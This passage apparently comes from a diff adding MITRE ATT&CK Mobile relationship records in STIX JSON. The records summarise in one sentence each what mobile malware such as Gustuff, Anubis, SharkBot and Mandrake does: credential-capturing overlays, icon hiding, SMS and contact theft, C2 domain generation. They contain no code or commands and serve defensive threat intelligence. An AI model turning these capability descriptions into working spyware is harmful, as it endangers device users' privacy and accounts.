"[Gustuff](https://attack.mitre.org/software/S0406) checks for antivirus software contained in a predefined list.(Citation: Talos Gustuff Apr 2019)", + "modified": "2022-04-15T16:55:56.825Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--51757971-17ac-40c3-bae7-78365579db49", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro-Obad", + "description": "Veo Zhang. (2013, June 13). Cybercriminals Improve Android Malware Stealth Routines with OBAD. 
Retrieved December 9, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:02:27.188Z", + "description": "[OBAD](https://attack.mitre.org/software/S0286) abuses device administrator access to make it more difficult for users to remove the application.(Citation: TrendMicro-Obad)", + "relationship_type": "uses", + "source_ref": "malware--ca4f63b9-a358-4214-bb26-8c912318cfde", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1284f6fe-d352-415c-9479-82141524380a", + "created": "2022-03-30T18:06:48.250Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Typically, insecure or malicious configuration settings are not installed without the user's consent. Users should be advised not to install unexpected configuration settings (CA certificates, iOS Configuration Profiles, Mobile Device Management server provisioning). 
", + "modified": "2022-03-30T18:06:48.250Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--79cb02f4-ac4e-4335-8b51-425c9573cce1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f58d3fc4-e0a2-4924-884d-85d7c8f00b8a", + "created": "2023-03-20T18:39:10.113Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:39:10.113Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--acf8fd2a-dc98-43b4-8d37-64e10728e591", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cc345ae4-0d60-4f21-98b3-596c15118745", + "created": "2023-02-06T19:42:46.814Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. 
Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:38:03.367Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can send SMS messages.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6c35f99c-153d-4023-a29a-821488ce5418", + "type": "relationship", + "created": "2020-04-08T15:41:19.383Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." 
+ } + ], + "modified": "2020-04-08T15:41:19.383Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can collect a list of installed applications to compare to a list of targeted applications.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a20493e1-4699-405d-a291-c28aae8ed737", + "created": "2022-04-18T16:53:24.617Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Wandera-RedDrop", + "url": "https://www.wandera.com/reddrop-malware/", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[RedDrop](https://attack.mitre.org/software/S0326) uses ads or other links within websites to encourage users to download the malicious apps using a complex content distribution network (CDN) and series of network redirects. 
[RedDrop](https://attack.mitre.org/software/S0326) also downloads additional components (APKs, JAR files) from different C2 servers.(Citation: Wandera-RedDrop) ", + "modified": "2022-04-20T16:33:23.507Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "target_ref": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00dc2b34-1b74-4dae-b6e4-b676528d6341", + "type": "relationship", + "created": "2019-07-16T14:33:12.085Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Triada June 2019", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019." + } + ], + "modified": "2020-04-27T16:52:49.480Z", + "description": "[Triada](https://attack.mitre.org/software/S0424) utilizes a backdoor in a Play Store app to install additional trojanized apps from the Command and Control server.(Citation: Google Triada June 2019)", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bf19207a-ac71-436d-8ef4-4ab059b533c8", + "created": "2019-09-04T15:38:56.721Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "FortiGuard-FlexiSpy", + "description": "K. 
Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. Retrieved September 10, 2019.", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:48:43.225Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) uses root access to establish reboot hooks to re-install the application from `/data/misc/adn`.(Citation: FortiGuard-FlexiSpy) At boot, [FlexiSpy](https://attack.mitre.org/software/S0408) spawns daemons for process monitoring, call monitoring, call managing, and system.(Citation: FortiGuard-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--96490f73-d8ef-4c6b-9a3a-3c66fc963306", + "type": "relationship", + "created": "2020-05-07T15:33:32.778Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CheckPoint Agent Smith", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020." 
+ } + ], + "modified": "2020-05-07T15:33:32.778Z", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) exploits known OS vulnerabilities, including Janus, to replace legitimate applications with malicious versions.(Citation: CheckPoint Agent Smith)", + "relationship_type": "uses", + "source_ref": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a3a8b2f2-f1aa-49ba-be55-a674f371f209", + "type": "relationship", + "created": "2020-04-24T15:06:33.449Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." 
+ } + ], + "modified": "2020-04-24T15:06:33.450Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can collect device network configuration information, such as Wi-Fi SSID and IMSI.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--74eb8469-1cce-40f8-8b6b-486338e8cfbe", + "type": "relationship", + "created": "2020-07-15T20:20:59.282Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." 
+ } + ], + "modified": "2020-07-15T20:20:59.282Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can record the screen.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a6bb6c55-3b33-4cd4-981b-055551edc4c2", + "created": "2023-01-18T21:24:28.714Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:55:39.648Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use a Domain Generation Algorithm to decode the C2 server location.(Citation: nccgroup_sharkbot_0322) ", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bd6829ee-dc51-477b-9739-1cd1cd304b6c", + "created": "2020-09-11T14:54:16.646Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + 
"external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/desert-scorpion-google-play" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:45:14.199Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can hide its icon.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5d0fdc8a-af17-4334-88e6-111aa290b22f", + "created": "2023-03-20T18:43:14.051Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:43:14.051Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6faacfdd-d17d-4c6e-a33e-5fdea2cc3998", + "created": "2020-04-08T15:41:19.385Z", + "x_mitre_version": "1.0", + "external_references": [ + 
{ + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Anubis](https://attack.mitre.org/software/S0422) can create overlays to capture user credentials for targeted applications.(Citation: Cofense Anubis)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cd7a2294-1e14-42e8-b870-d99d73443b88", + "created": "2022-04-01T12:37:42.068Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be taught the danger behind granting unnecessary permissions to an application and should be advised to use extra scrutiny when an application requests them. 
", + "modified": "2022-04-01T12:37:42.068Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--aa1deed1-800c-470b-ac88-eb8013c11ec0", + "created": "2019-09-03T20:08:00.711Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Group IB Gustuff Mar 2019", + "url": "https://www.group-ib.com/blog/gustuff", + "description": "Group-IB. (2019, March 28). Group-IB uncovers Android Trojan named «Gustuff» capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. Retrieved September 3, 2019." + }, + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Gustuff](https://attack.mitre.org/software/S0406) uses WebView overlays to prompt the user for their device unlock code, as well as banking and cryptocurrency application credentials. 
[Gustuff](https://attack.mitre.org/software/S0406) can also send push notifications pretending to be from a bank, triggering a phishing overlay.(Citation: Talos Gustuff Apr 2019)(Citation: Group IB Gustuff Mar 2019)", + "modified": "2022-04-19T19:42:17.904Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fda8fe32-6121-4b81-9aa0-4e9596db88b1", + "created": "2020-07-15T20:20:59.227Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. 
Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:33:57.748Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can access SMS messages.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--50bab448-fee6-49e9-a296-498fe06eacc7", + "type": "relationship", + "created": "2019-11-21T16:42:48.490Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019." 
+ } + ], + "modified": "2019-11-21T16:42:48.490Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can obtain a list of installed applications.(Citation: SecureList - ViceLeaker 2019)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3c874ffa-63c3-491f-8d8c-623b19a7fdad", + "created": "2020-04-24T15:06:33.397Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:37:37.674Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can collect the device’s call log.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8b2c2716-a62b-4c3a-a211-d72bb5ed29b9", + "created": "2020-09-11T14:54:16.649Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + 
"source_name": "Lookout Desert Scorpion", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/desert-scorpion-google-play" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:52:05.260Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can collect the device’s contact list.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bc79d59b-1828-4133-9f8f-df8cad9543a8", + "created": "2019-11-21T16:42:48.459Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. 
Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:37:19.124Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can delete arbitrary files from the device.(Citation: SecureList - ViceLeaker 2019)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4819f391-01de-4525-992b-7e4a4f6667de", + "type": "relationship", + "created": "2020-11-20T15:46:51.603Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." 
+ } + ], + "modified": "2020-11-20T15:46:51.603Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can take pictures with the camera.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--749dcdbd-9be9-403b-850f-8ee5452b7aed", + "created": "2023-03-20T18:58:56.347Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:58:56.347Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e0c3afc8-4b23-45fc-89cf-2cafbb51291e", + "created": "2023-03-03T16:25:52.931Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. 
Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:25:52.931Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has collected information about installed applications.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3acbaa64-fb6e-4c26-ada4-1aab88798265", + "created": "2021-04-19T14:29:46.510Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling 